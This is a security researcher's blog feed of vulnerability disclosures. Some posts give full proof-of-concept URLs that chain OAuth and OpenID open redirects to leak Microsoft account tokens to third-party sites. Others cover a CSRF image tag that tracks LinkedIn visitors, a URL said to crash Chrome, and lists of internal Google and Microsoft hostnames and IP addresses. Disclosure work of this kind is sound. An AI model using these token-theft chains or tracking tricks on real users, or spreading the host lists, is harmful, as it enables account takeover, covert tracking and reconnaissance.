tag:blogger.com,1999:blog-27580339325571682782024-03-05T06:07:16.720-08:00Andris Atteka's BlogUnknownnoreply@blogger.comBlogger9125tag:blogger.com,1999:blog-2758033932557168278.post-19575541126996735202015-09-18T14:57:00.000-07:002015-09-27T02:02:53.903-07:00A simple string to crash Google Chrome<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Recently I reported a crash bug in Google Chrome (issue #533361). This issue reminded me of the </span><a href="http://www.theguardian.com/technology/2015/jun/03/skype-bug-breaks-app" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">recent Skype vulnerability</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - both occur with simple URL strings. So how can you crash Google Chrome? By adding a NULL char in the URL string:</span></div>
<br />
<div style="text-align: center;">
<blockquote class="tr_bq">
<div>
<a href="http://biome3d.com/" target="_blank"><b id="docs-internal-guid-9b073a10-e273-66ad-4461-c97da7d485fc" style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">http://biome3d.com/</span></b></a></div>
</blockquote>
</div>
<span id="docs-internal-guid-9b073a10-e26b-a9be-37fd-5d02eb924355"></span><br />
<span id="docs-internal-guid-9b073a10-e26b-a9be-37fd-5d02eb924355">
<span style="font-family: Arial; font-size: 14.6666666666667px; vertical-align: baseline; white-space: pre-wrap;"></span></span>
<br />
<div style="text-align: justify;">
<span id="docs-internal-guid-9b073a10-e26b-a9be-37fd-5d02eb924355"><span style="font-family: Arial; font-size: 14.6666666666667px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 14.6666666666667px;">Unfortunately no reward was awarded as this was deemed to be only a DOS vulnerability. Anyway, making secure software is much harder than finding issues in it. Thanks Google.</span></span></span></div>
<span id="docs-internal-guid-9b073a10-e26b-a9be-37fd-5d02eb924355"><span style="font-family: Arial; font-size: 14.6666666666667px; vertical-align: baseline; white-space: pre-wrap;">
</span></span>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2758033932557168278.post-3539165069938093092015-04-15T10:57:00.000-07:002015-05-03T05:44:33.554-07:00Google, Microsoft and token leaksSome stir recently was caused by <a href="http://intothesymmetry.blogspot.ch/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html" target="_blank">OAuth open redirector</a> and even an <a href="https://tools.ietf.org/id/draft-bradley-oauth-open-redirector-01.txt" target="_blank">RFC security addendum</a> was created for it. While this was <a href="http://www.oauthsecurity.com/" target="_blank">known for quite some time already</a>, it's still good to remind the general public. So here's another known issue - an Open Redirector in OpenID.<br />
It works like this - whenever <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"checkid_immediate" </span>mode is used it redirects without any questions asked. And here's an example in <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">accounts.google.com</span>:<br />
<blockquote class="tr_bq">
<a href="https://accounts.google.com/o/openid2/auth?openid.claimed_id=http://specs.openid.net/auth/2.0/identifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http://axschema.org/contact/email&openid.identity=http://specs.openid.net/auth/2.0/identifier_select&openid.mode=checkid_immediate&openid.ns=http://specs.openid.net/auth/2.0&openid.ns.ext0=http://openid.net/srv/ax/1.0&openid.ns.ui=http://specs.openid.net/extensions/ui/1.0&openid.realm=http://www.simcracy.com/&openid.return_to=http://www.simcracy.com/a#a">https://accounts.google.com/o/openid2/auth?openid.claimed_id=http://specs.openid.net/auth/2.0/identifier_select&openid.ext0.mode=fetch_request&openid.ext0.required=email&openid.ext0.type.email=http://axschema.org/contact/email&openid.identity=http://specs.openid.net/auth/2.0/identifier_select&openid.mode=checkid_immediate&openid.ns=http://specs.openid.net/auth/2.0&openid.ns.ext0=http://openid.net/srv/ax/1.0&openid.ns.ui=http://specs.openid.net/extensions/ui/1.0&openid.realm=http://www.simcracy.com/&openid.return_to=http://www.simcracy.com/a#a</a></blockquote>
<div style="text-align: justify;">
For a full exploit let's just use OAuth app (created by Google) that imports some data from Microsoft: </div>
<blockquote class="tr_bq">
<a href="https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=00000000401058A9&scope=wl.emails&redirect_uri=https://accounts.google.com" target="_blank">https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=00000000401058A9&scope=wl.emails&redirect_uri=https://accounts.google.com</a></blockquote>
And here's the full Proof of Concept:<br />
<blockquote class="tr_bq">
<a href="https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=00000000401058A9&scope=wl.emails&redirect_uri=https://accounts.google.com/o/openid2/auth%3Fopenid.claimed_id%3Dhttp://specs.openid.net/auth/2.0/identifier_select%26openid.ext0.mode%3Dfetch_request%26openid.ext0.required%3Demail%26openid.ext0.type.email%3Dhttp://axschema.org/contact/email%26openid.identity%3Dhttp://specs.openid.net/auth/2.0/identifier_select%26openid.mode%3Dcheckid_immediate%26openid.ns%3Dhttp://specs.openid.net/auth/2.0%26openid.ns.ext0%3Dhttp://openid.net/srv/ax/1.0%26openid.ns.ui%3Dhttp://specs.openid.net/extensions/ui/1.0%26openid.realm%3Dhttps://www.courlandconsulting.com/%26openid.return_to%3Dhttps://www.courlandconsulting.com/a%23a" target="_blank">https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=00000000401058A9&scope=wl.emails&redirect_uri=https://accounts.google.com/o/openid2/auth%3Fopenid.claimed_id%3Dhttp://specs.openid.net/auth/2.0/identifier_select%26openid.ext0.mode%3Dfetch_request%26openid.ext0.required%3Demail%26openid.ext0.type.email%3Dhttp://axschema.org/contact/email%26openid.identity%3Dhttp://specs.openid.net/auth/2.0/identifier_select%26openid.mode%3Dcheckid_immediate%26openid.ns%3Dhttp://specs.openid.net/auth/2.0%26openid.ns.ext0%3Dhttp://openid.net/srv/ax/1.0%26openid.ns.ui%3Dhttp://specs.openid.net/extensions/ui/1.0%26openid.realm%3Dhttps://www.courlandconsulting.com/%26openid.return_to%3Dhttps://www.courlandconsulting.com/a%23a</a></blockquote>
<div>
<div style="text-align: justify;">
If you now inspect the URL, you'll notice that token was sent to my third party site.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And here the real problem with Authentication Providers comes in - is this a Relying Party (Google) or Authentication Provider (Microsoft) problem? Whatever the answer - users are the ones suffering.</div>
</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2758033932557168278.post-69054636054893782432014-10-12T23:46:00.000-07:002014-10-17T02:27:28.434-07:00Creepy visitor tracking using LinkedinA few days ago I performed an experiment and added the following code to my blog:<br />
<blockquote class="tr_bq" style="text-align: center;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><img src="https://www.linkedin.com/profile/view?authToken=zRgB&authType=name&id=98261032" /></span></blockquote>
<div style="text-align: justify;">
Link in the code snippet points to my Linkedin profile and those familiar with web security will recognize the CSRF here (and the token apparently isn't validated correctly).</div>
<div style="text-align: justify;">
So how did the experiment unfold? Anyone who visited my blog also involuntary visited my Linkedin profile. It turns out that around 35% of blog visitors were also logged in to their Linkedin accounts while browsing the Web and my Linkedin profile received more than 800 "profile views" with details about these visitors:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkt3t1Vvps21yJHIXd1Y2qYwBuyFKoVzN_P_kD6huW0UTNCIXjHfFPju9_23RGdOjd-CrotvlMRD4XdTHrEwI8pigo8T0DROpDo9jx4PDoeRUndivZ5Ir7JvD2oAL0VZbf6oSK89oi-iQ/s1600/Screenshot+from+2014-10-11+20:17:04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkt3t1Vvps21yJHIXd1Y2qYwBuyFKoVzN_P_kD6huW0UTNCIXjHfFPju9_23RGdOjd-CrotvlMRD4XdTHrEwI8pigo8T0DROpDo9jx4PDoeRUndivZ5Ir7JvD2oAL0VZbf6oSK89oi-iQ/s1600/Screenshot+from+2014-10-11+20:17:04.png" height="182" width="400" /></a></div>
<br />
<div style="text-align: justify;">
So a little advice - if you prefer privacy don't forget to sign out of your Linkedin account before browsing the Web.</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2758033932557168278.post-2409004622202465832014-10-07T23:56:00.000-07:002014-10-10T04:06:43.644-07:00Microsoft's internal subdomains<div style="text-align: justify;">
Outlook.com webmail service has a nice feature - it highlights potentially incorrect e-mail addresses in the "To" field. But what happens if we try to use some obscure subdomains? Well, it looks like the auto-correct feature works just as well for Microsoft's internal subdomains:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnZDAKOFvMIwsyGlOpAxx_SnzuqtiL7R7FA_GAb8E-5seUfvERVR7YbuvQsindqPqPIXyP8ooCHYhWlT_j5iKKwIpe_Nd3lvN3cJKLpcqNhpx98h5jmF3OkHLSYVU_5utE0hREHnDMg_s/s1600/Screenshot+from+2014-10-07+16:28:15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnZDAKOFvMIwsyGlOpAxx_SnzuqtiL7R7FA_GAb8E-5seUfvERVR7YbuvQsindqPqPIXyP8ooCHYhWlT_j5iKKwIpe_Nd3lvN3cJKLpcqNhpx98h5jmF3OkHLSYVU_5utE0hREHnDMg_s/s1600/Screenshot+from+2014-10-07+16:28:15.png" height="124" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
As you can see both <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">citrix.corp.microsoft.com</span> and <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aol.corp.microsoft.com</span> are recognized as valid e-mail addresses, however <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">blabla.corp.microsoft.com</span> is considered an invalid one. Here are some of the subdomains that auto-corrector recognizes as valid ones are:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">google.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rally.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">citrix.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">vmware.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aol.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cirrus.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cisco.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bluephoenix.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">twitter.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">qualys.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">blizzard.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">alliance.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">amber.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">api.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">apple.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">arm.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ascent.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">asml.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">aspen.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">axt.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">blackbox.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cabot.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">caci.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cai.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">carbonite.corp.microsoft.com</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cavium.corp.microsoft.com</span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2758033932557168278.post-88712271545778563222014-09-16T06:58:00.001-07:002014-10-17T02:28:05.344-07:00How Microsoft is giving your data to Facebook… and everyone else<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<br />
<div style="text-align: justify;">
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">A lot has been written about dangers of mistakes in OAuth implementations. Here’s another story.
Microsoft uses a specialized OAuth scope </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">wli.contacts_emails</span><span style="font-family: Arial;"> </span><span style="font-family: Arial; font-size: 15px;">which is available only to Facebook’s app. An interesting part is that users are never notified that the app is trying to access their data and permission is granted silently.
You can try this here (you’ll have to login):
</span></span><br />
<blockquote class="tr_bq">
<span style="line-height: 17.25px; white-space: pre-wrap;"><a href="https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=https%3A%2F%2Fwww.facebook.com%2F" target="_blank"><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=https%3A%2F%2Fwww.facebook.com%2F</span></a></span></blockquote>
<span style="font-family: Arial;"><span style="font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">As you can see OAuth token was just sent to Facebook.
Silently granting permission to Facebook probably is not the worst thing (we do trust Facebook, right?). So let’s continue…</span></span></div>
<div style="text-align: justify;">
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">
If you try to modify “</span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">redirect_uri</span><span style="font-family: Arial; font-size: 15px;">” parameter you’ll notice that token is issued to any URL within </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">facebook.com</span><span style="font-family: Arial; font-size: 15px;"> domain. So to leak the OAuth token to a malicious third-party an Open Redirect in </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">facebook.com</span><span style="font-family: Arial; font-size: 15px;"> domain would be required. As Open Redirects are usually considered low severity vulnerabilities it's not particularly hard to find one. For this example we will utilize an Open Redirect in Facebook’s authorization flow (by providing an invalid ‘</span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">scope</span><span style="font-family: Arial; font-size: 15px;">’ parameter). It works like this:
</span></span><br />
<blockquote class="tr_bq">
<span style="color: #0000ee; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 17.25px; white-space: pre-wrap;"><u><a href="https://www.facebook.com/dialog/oauth?type=web_server&scope=invalid&display=popup&client_id=260755904036570&redirect_uri=http://simcracy.com" target="_blank">https://www.facebook.com/dialog/oauth?type=web_server&scope=invalid&display=popup&client_id=260755904036570&redirect_uri=http://simcracy.com</a></u></span></span></blockquote>
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">So by chaining the two bugs we are able to acquire OAuth tokens from </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">live.com</span><span style="font-family: Arial; font-size: 15px;"> users. The complete example is here:</span></span></div>
<blockquote class="tr_bq" style="text-align: justify;">
<span style="line-height: 17.25px; white-space: pre-wrap;"><a href="https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fh%5B%5D%26u%3Dgraph.facebook.com%252Foauth%252Fauthorize%253Ftype%253Dweb_server%2526scope%253De%2526client_id%253D260755904036570%2526redirect_uri%253Dhttp%253A%252F%252Fsimcracy.com" target="_blank"><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fh%5B%5D%26u%3Dgraph.facebook.com%252Foauth%252Fauthorize%253Ftype%253Dweb_server%2526scope%253De%2526client_id%253D260755904036570%2526redirect_uri%253Dhttp%253A%252F%252Fsimcracy.com</span></a></span></blockquote>
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">If you now inspect the destination URL, you'll notice that Microsoft's OAuth token was sent to a third-party website without your consent.</span></div>
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">Lessons learned:</span></div>
<div style="text-align: justify;">
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">OAuth implementations should never whitelist entire domains, only a few URLs so that “</span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">redirect_uri</span><span style="font-family: Arial; font-size: 15px;">” can’t be pointed to an Open Redirect. Also developers should be careful when silently granting access to apps (manually approving an app probably will not make user experience much worse).
Timeline:
</span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2013/11/19 - OAuth </span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 17.25px; white-space: pre-wrap;">vulnerability</span><span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> reported to Microsoft
2013/11/27 - Open Redirect vulnerability reported to Facebook
2014/09/16 - Public disclosure</span></span><br />
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></span>
<span style="line-height: 17.25px; white-space: pre-wrap;"><span style="font-family: Arial; font-size: 15px;">Update [</span></span><span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">2014/09/17</span><span style="font-family: Arial; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;">]: Microsoft has fixed the OAuth vulnerability</span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2758033932557168278.post-48598079210539338572014-01-03T08:18:00.000-08:002014-01-03T08:18:24.541-08:00The threat of login CSRFLogin CSRF is an often overlooked web vulnerability. Developers tend to focus on securing user data and assume that users wouldn't voluntarily give up access to their accounts. Yet with login CSRF exactly this happens - attacker is giving full control of his account to the victim (of course it's a fake account). Once the victim and attacker are in the same trust domain various other attacks become possible.<br />
<br />
Consequences can vary:<br />
<br />
<ul>
<li>attacker can monitor victim's actions</li>
<li>attacker can interact with the victim without him realizing that a session swap just occured</li>
<li>some low severity bugs can become exploitable (e.g. an XSS in configuration page, that is visible only to the account holder)</li>
<li>or just google up the links, maybe you'll find some unexpired password reset links etc. that actually log you into the victim's account</li>
</ul>
<br />
To mitigate this issue don't log in users where that's not required. If it's a password reset link, only reset password, if it's an e-mail confirmation link, only confirm e-mail without loging in the user. And make sure your other login forms are CSRF protected.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2758033932557168278.post-67347309332876198872013-11-30T06:49:00.000-08:002014-10-17T02:26:02.978-07:00Scanning for Google's Active Directory computer namesIf you remember ad.corp.google.com from the <a href="http://andrisatteka.blogspot.com/2013/11/scanning-for-googles-internal-corporate_25.html" target="_blank">previous post</a>, maybe you are wondering whether it stands for "Active Directory"? Looks like it does. So here's another list - apparently composed of Active Directory computer names. The list was obtained by sending e-mails to e.g.<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> test@jfarrell1-w.ad.corp.google.com</span> through Gmail.<br />
<div>
<br />
<table>
<tbody>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bbudge1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.71.111</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rubin1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.217.98</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jfarrell1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.100.63.199</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">dario1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.114.234</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">munjal1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.23.165.169</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bedlam.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.100.6</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">gene1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.79.134</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">trade1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.215.182</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">boss1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.83.209, 172.19.68.53</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">edgar1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.150.252</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">phoenix1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.145.248</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">gilberto1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.118.175, 172.19.54.117</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">deven1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.16.16</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">luciano1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.23.72.189</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kieran1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.66.67</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jar1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.71.95</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mix1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.115.199</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">angelo1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.28.114.91</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">khalid1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.231.132</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">freddy1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.29.164.22</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">brewer1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.45.123</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">philip1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.16.61.165</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rgupta1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.37.40</span></td></tr>
</tbody></table>
</div>
<div>
<br /></div>
<div>
Judging by the names it looks like these machines are workstations used by Google employees.</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2758033932557168278.post-51526847163550435812013-11-25T11:13:00.000-08:002013-11-25T11:13:30.526-08:00Scanning for Google's internal corporate subdomains - part 2And here are some more domain names:<br />
<table>
<tbody>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hulk.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.191.134</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">coffee.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.66.19</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">flip.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.95.138</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pizza.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.4.37</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pond.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.118.28</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">welcome.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.172.92</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">nonprofit.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.13</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ship.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.108.124</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lens.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.94.141</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">miracle.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.122.67</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jet.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.29.86.122</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">unity.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.206.3</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">twist.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.42.23</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uncertainty.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.108.157</span></td></tr>
